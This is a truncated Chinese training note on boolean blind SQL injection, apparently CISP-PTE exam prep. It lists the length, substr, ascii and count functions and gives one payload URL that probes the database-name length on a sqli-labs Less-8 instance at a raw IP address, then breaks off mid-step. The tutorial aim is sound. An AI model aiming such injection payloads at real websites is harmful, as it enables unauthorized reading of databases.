【PTE-day04 SQL注入盲注】

数据库常用函数

length()#长度函数
substr()#截取函数
ascii()#阿斯科码转换
count()#统计函数

1、布尔盲注

(1)判断数据库长度

http://124.222.124.9:8888/Less-8/?id=1' and length(database())=8 --+

(2)截取数据库名,判断字符的ascii码值

http:

你可能感兴趣的:(CISP-PTE,sql,数据库,oracle)